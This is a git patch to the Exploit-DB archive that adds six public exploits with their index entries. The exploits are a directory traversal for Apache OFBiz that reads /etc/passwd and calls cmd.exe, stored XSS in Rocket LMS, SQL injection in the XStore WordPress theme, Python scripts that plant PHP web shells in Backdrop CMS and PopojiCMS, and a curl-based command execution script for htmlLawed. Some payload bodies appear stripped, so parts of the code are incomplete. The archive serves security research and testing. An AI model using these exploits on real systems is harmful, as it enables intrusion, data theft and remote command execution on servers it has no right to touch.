From 094f6f9304e853dc52fa71f2cec8423ea3ccb3cd Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Mon, 20 May 2024 00:16:24 +0000 Subject: [PATCH] DB: 2024-05-20 7 changes to exploits/shellcodes/ghdb Apache OFBiz 18.12.12 - Directory Traversal Backdrop CMS 1.27.1 - Remote Command Execution (RCE) htmlLawed 1.2.5 - Remote Code Execution (RCE) PopojiCMS 2.0.1 - Remote Command Execution (RCE) Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS) Wordpress Theme XStore 9.3.8 - SQLi --- exploits/java/webapps/52020.txt | 43 +++++++++++++++ exploits/php/webapps/52018.tzt | 18 ++++++ exploits/php/webapps/52019.txt | 21 +++++++ exploits/php/webapps/52021.py | 97 +++++++++++++++++++++++++++++++++ exploits/php/webapps/52022.py | 66 ++++++++++++++++++++++ exploits/php/webapps/52023.sh | 35 ++++++++++++ files_exploits.csv | 6 ++ 7 files changed, 286 insertions(+) create mode 100644 exploits/java/webapps/52020.txt create mode 100644 exploits/php/webapps/52018.tzt create mode 100644 exploits/php/webapps/52019.txt create mode 100755 exploits/php/webapps/52021.py create mode 100755 exploits/php/webapps/52022.py create mode 100755 exploits/php/webapps/52023.sh diff --git a/exploits/java/webapps/52020.txt b/exploits/java/webapps/52020.txt new file mode 100644 index 0000000000..83528a0bff --- /dev/null +++ b/exploits/java/webapps/52020.txt @@ -0,0 +1,43 @@ +# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal +# Google Dork: N/A +# Date: 2024-05-16 +# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) +# Vendor Homepage: https://ofbiz.apache.org/ +## Software Link: https://ofbiz.apache.org/download.html +# Version: below <=18.12.12 +# Tested on: Windows10 + + +Poc. +1- +POST /webtools/control/xmlrpc HTTP/1.1 +Host: vulnerable-host.com +Content-Type: text/xml + + + + example.createBlogPost + + + ../../../../../../etc/passwd + + + + +OR + +2- +POST /webtools/control/xmlrpc HTTP/1.1 +Host: vulnerable-host.com +Content-Type: text/xml + + + + performCommand + + + +../../../../../../windows/system32/cmd.exe?/c+dir+c:\ + + + \ No newline at end of file diff --git a/exploits/php/webapps/52018.tzt b/exploits/php/webapps/52018.tzt new file mode 100644 index 0000000000..3f3fb804e5 --- /dev/null +++ b/exploits/php/webapps/52018.tzt @@ -0,0 +1,18 @@ +# Title: Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS) +# Date: 04/16/2024 +# Exploit Author: Sergio Medeiros +# Vendor Homepage: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735 +# Software Link: https://lms.rocket-soft.org +# Version: 1.9 +# Tested on Firefox and Chrome Browsers +# Patched Version: Patch Pending +# Category: Web Application +# CVE: CVE-2024-34241 +# Exploit link: https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide +# PoC: + +In order to exploit this systemic stored XSS vulnerability, identify theareas in the web application which has a WYSIWIG editor used, for example, the create/edit course description section. +Input random text in the description section, and create the course while intercepting the request with BurpSuite or your preferred proxy of choice. + +In the *description* parameter or the associated parameter that is handling the user input related to the WYSIWIG editor, input the following payload and then issue the request: +
\ No newline at end of file diff --git a/exploits/php/webapps/52019.txt b/exploits/php/webapps/52019.txt new file mode 100644 index 0000000000..f0236e7624 --- /dev/null +++ b/exploits/php/webapps/52019.txt @@ -0,0 +1,21 @@ +# Exploit Title: Wordpress Theme XStore 9.3.8 - SQLi +# Google Dork: N/A +# Date: 2024-05-16 +# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) +# Version: 5.3.5 +# Tested on: Windows10 +# CVE: CVE-2024-33559 + + +Poc + + +POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1 +Host: example.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/php/webapps/52021.py b/exploits/php/webapps/52021.py new file mode 100755 index 0000000000..4770b5099b --- /dev/null +++ b/exploits/php/webapps/52021.py @@ -0,0 +1,97 @@ +# Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE) +# Date: 04/27/2024 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://backdropcms.org/ +# Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip +# Version: latest +# Tested on: MacOS + +import os +import time +import zipfile + + + +def create_files(): +info_content = """ +type = module +name = Block +description = Controls the visual building blocks a page is constructed +with. Blocks are boxes of content rendered into an area, or region, of a +web page. +package = Layouts +tags[] = Blocks +tags[] = Site Architecture +version = BACKDROP_VERSION +backdrop = 1.x + +configure = admin/structure/block + +; Added by Backdrop CMS packaging script on 2024-03-07 +project = backdrop +version = 1.27.1 +timestamp = 1709862662 +""" +shell_info_path = "shell/shell.info" +os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü +oluşturur +with open(shell_info_path, "w") as file: +file.write(info_content) + +shell_content = """ + + +
+ + +
+
+
+
+ + +""" +shell_php_path = "shell/shell.php" +with open(shell_php_path, "w") as file: +file.write(shell_content) + +return shell_info_path, shell_php_path + +def create_zip(info_path, php_path): +zip_filename = "shell.zip" +with zipfile.ZipFile(zip_filename, 'w') as zipf: +# Dosyaları shell klasörü altında sakla +zipf.write(info_path, arcname='shell/shell.info') +zipf.write(php_path, arcname='shell/shell.php') +return zip_filename + +def main(url): +print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit") +time.sleep(3) + +print("Evil module generating...") +time.sleep(2) + +info_path, php_path = create_files() +zip_filename = create_zip(info_path, php_path) + +print("Evil module generated!", zip_filename) +time.sleep(2) + +print("Go to " + url + "/admin/modules/install and upload the " + +zip_filename + " for Manual Installation.") +time.sleep(2) + +print("Your shell address:", url + "/modules/shell/shell.php") + +if __name__ == "__main__": +import sys +if len(sys.argv) < 2: +print("Usage: python script.py [url]") +else: +main(sys.argv[1]) \ No newline at end of file diff --git a/exploits/php/webapps/52022.py b/exploits/php/webapps/52022.py new file mode 100755 index 0000000000..677fb7f67b --- /dev/null +++ b/exploits/php/webapps/52022.py @@ -0,0 +1,66 @@ +# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution +# Date: 14/04/2024 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.popojicms.org/ +# Software Link: +https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip +# Version: Version : 2.0.1 +# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS + +import requests +import time +import sys + +def exploit(url, username, password): + +login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin" +login_data = {"username": username, "password": password} +headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f +"{url}/po-admin/index.php"} +session = requests.Session() +login_response = session.post(login_url, data=login_data, headers=headers) +if "Administrator PopojiCMS" in login_response.text: +print("Login Successful!") +time.sleep(1) # 1 saniye bekle +else: +print("Login Failed!") +return + +edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial" +edit_data = {"meta_content": """ + +
+ + +
+
+
+
+ +"""} +edit_response = session.post(edit_url, data=edit_data, headers=headers) +if "cmd" in edit_response.text: +print("Your shell is ready:", url) +time.sleep(1) +else: +print("Exploit Failed!") +return + +if __name__ == "__main__": +if len(sys.argv) != 4: +print("Kullanım: python exploit.py sitename username password") +sys.exit(1) + +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +print("Exploiting...") +time.sleep(1) +print("Logging in...") +time.sleep(1) +exploit(url, username, password) \ No newline at end of file diff --git a/exploits/php/webapps/52023.sh b/exploits/php/webapps/52023.sh new file mode 100755 index 0000000000..bcb7617109 --- /dev/null +++ b/exploits/php/webapps/52023.sh @@ -0,0 +1,35 @@ +# Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE) +# Date: 2024-04-24 +# Exploit Author: Miguel Redondo (aka d4t4s3c) +# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed +# Software Link: https://github.com/kesar/HTMLawed +# Version: <= 1.2.5 +# Tested on: Linux +# CVE: CVE-2022-35914 + +banner(){ + echo " ______ _______ ____ ___ ____ ____ _________ ___ _ _ _" + echo " / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |" + echo "| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_" + echo "| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|" + echo " \____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|" +} + +while getopts ":u:c:" arg; do + case $arg in + u) URL=$OPTARG; let parameter_counter+=1 ;; + c) CMD=$OPTARG; let parameter_counter+=1 ;; + esac +done + + +if [ -z "$URL" ] || [ -z "$CMD" ]; then + banner + echo -e "\n[i] Usage: ${0} -u -c \n" + exit +else + banner + echo -e "\n[+] Command output:" +fi + +curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\  \[[0-9]+\] =\>'| sed -E 's/\  \[[0-9]+\] =\> (.*)
/\1/' \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3b4f231fb9..184944956a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5463,6 +5463,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 37110,exploits/java/webapps/37110.py,"Apache JackRabbit - WebDAV XML External Entity",2015-05-26,"Mikhail Egorov",webapps,java,8080,2015-05-26,2017-11-02,0,CVE-2015-1833;OSVDB-122382,,,,, 45673,exploits/java/webapps/45673.py,"Apache OFBiz 16.11.04 - XML External Entity Injection",2018-10-24,"Jamie Parfet",webapps,java,,2018-10-24,2018-10-25,0,,"XML External Entity (XXE)",,,, 48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java,,2020-05-01,2020-05-01,0,CVE-2019-0235,,,,, +52020,exploits/java/webapps/52020.txt,"Apache OFBiz 18.12.12 - Directory Traversal",2024-05-19,"Abdualhadi khalifa",webapps,java,,2024-05-19,2024-05-19,0,CVE-2024-32113,,,,, 47770,exploits/java/webapps/47770.txt,"Apache Olingo OData 4.0 - XML External Entity Injection",2019-12-11,"Compass Security",webapps,java,,2019-12-11,2019-12-11,0,CVE-2019-17554,"XML External Entity (XXE)",,,http://www.exploit-db.comOlingo-OData-4.6.0-source-release.zip, 46759,exploits/java/webapps/46759.txt,"Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting",2019-04-26,"Dhiraj Mishra",webapps,java,,2019-04-26,2019-04-26,0,CVE-2019-0186,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.compluto-3.0.0-source-release.zip, 47572,exploits/java/webapps/47572.py,"Apache Solr 8.2.0 - Remote Code Execution",2019-11-01,@l3x_wong,webapps,java,,2019-11-01,2020-04-16,0,CVE-2019-17558,,,,, @@ -14585,6 +14586,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip, 51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,, +52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-05-19,0,,,,,, 51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info @@ -19785,6 +19787,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47588,exploits/php/webapps/47588.txt,"html5_snmp 1.11 - 'Router_ID' SQL Injection",2019-11-05,cakes,webapps,php,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comhtml5_snmp-master.zip, 27237,exploits/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",webapps,php,,2006-02-15,2013-07-31,1,,,,,,https://www.securityfocus.com/bid/16680/info 29910,exploits/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2327;OSVDB-35525,,,,,https://www.securityfocus.com/bid/23664/info +52023,exploits/php/webapps/52023.sh,"htmlLawed 1.2.5 - Remote Code Execution (RCE)",2024-05-19,"Miguel Redondo",webapps,php,,2024-05-19,2024-05-19,0,CVE-2022-35914,,,,, 22896,exploits/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,webapps,php,,2003-07-13,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8174/info 51979,exploits/php/webapps/51979.txt,"HTMLy Version v2.9.6 - Stored XSS",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 2791,exploits/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",webapps,php,,2006-11-15,2016-09-16,1,CVE-2006-7134,,,,http://www.exploit-db.comupload.tar.gz, @@ -28123,6 +28126,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5788,exploits/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,webapps,php,,2008-06-10,,1,OSVDB-46100;CVE-2008-2753;OSVDB-46099;OSVDB-46098,,,,,http://www.bugreport.ir/?/42 3121,exploits/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,webapps,php,,2007-01-11,,1,OSVDB-32807;CVE-2007-0307,,,,, 31605,exploits/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 - Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,webapps,php,,2008-04-04,2014-02-12,1,CVE-2008-1787;OSVDB-44403,,,,,https://www.securityfocus.com/bid/28608/info +52022,exploits/php/webapps/52022.py,"PopojiCMS 2.0.1 - Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-05-19,0,,,,,, 51982,exploits/php/webapps/51982.txt,"PopojiCMS Version 2.0.1 - Remote Command Execution",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 4481,exploits/php/webapps/4481.txt,"Poppawid 2.7 - 'form' Remote File Inclusion",2007-10-02,0in,webapps,php,,2007-10-01,2016-10-12,1,OSVDB-37422;CVE-2007-5221,,,,http://www.exploit-db.compoppawid.2.7.tar.gz, 2351,exploits/php/webapps/2351.txt,"Popper 1.41-r2 - 'form' Remote File Inclusion",2006-09-12,SHiKaA,webapps,php,,2006-09-11,2016-09-09,1,,,,,http://www.exploit-db.compopper-1.41-r2.tar.gz, @@ -29035,6 +29039,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9553,exploits/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (1)",2009-08-31,Affix,webapps,php,,2009-08-30,2016-10-27,1,OSVDB-57588;CVE-2009-3252,,,,, 34455,exploits/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (2)",2010-08-12,Affix,webapps,php,,2010-08-12,2014-08-28,1,CVE-2009-3252;OSVDB-57588,,,,,https://www.securityfocus.com/bid/42424/info 50677,exploits/php/webapps/50677.txt,"Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)",2022-01-19,Vulnerability-Lab,webapps,php,,2022-01-19,2022-01-19,0,,,,,, +52018,exploits/php/webapps/52018.tzt,"Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS)",2024-05-19,"Sergio Medeiros",webapps,php,,2024-05-19,2024-05-19,0,CVE-2024-34241,,,,, 51437,exploits/php/webapps/51437.txt,"RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)",2023-05-13,"Rafael Pedrero",webapps,php,,2023-05-13,2023-05-13,0,,,,,, 39682,exploits/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",webapps,php,80,2016-04-11,2016-04-14,0,,,,,http://www.exploit-db.comrockmongo-1.1.7.tar.gz, 11731,exploits/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Admin Bypass",2010-03-14,ITSecTeam,webapps,php,,2010-03-13,,0,,,,,http://www.exploit-db.comRogioBiz_PHP_file_manager_V1.2.zip, @@ -34133,6 +34138,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49107,exploits/php/webapps/49107.txt,"Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting",2020-11-27,"Ilca Lucian Florin",webapps,php,,2020-11-27,2020-11-27,0,,,,,, 51510,exploits/php/webapps/51510.py,"WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution",2023-06-09,"Mohammad Hossein Khanaki",webapps,php,,2023-06-09,2023-06-09,0,CVE-2021-24499,,,,, 38063,exploits/php/webapps/38063.txt,"WordPress Theme Wp-ImageZoom - 'id' SQL Injection",2012-11-26,Amirh03in,webapps,php,,2012-11-26,2015-09-02,1,OSVDB-87870,,,,,https://www.securityfocus.com/bid/56691/info +52019,exploits/php/webapps/52019.txt,"Wordpress Theme XStore 9.3.8 - SQLi",2024-05-19,"Abdualhadi khalifa",webapps,php,,2024-05-19,2024-05-19,0,CVE-2024-33559,,,,, 47436,exploits/php/webapps/47436.txt,"WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting",2019-09-27,m0ze,webapps,php,,2019-09-27,2019-09-27,0,,,,,, 6336,exploits/php/webapps/6336.txt,"Words tag script 1.2 - 'word' SQL Injection",2008-08-31,"Hussin X",webapps,php,,2008-08-30,2016-12-20,1,OSVDB-47912;CVE-2008-3945,,,,, 4446,exploits/php/webapps/4446.txt,"Wordsmith 1.1b - 'config.inc.php?_path' Remote File Inclusion",2007-09-23,ShockShadow,webapps,php,,2007-09-22,2016-10-12,1,OSVDB-37223;CVE-2007-5102,,,,http://www.exploit-db.comwordsmith1.1_RC1.zip,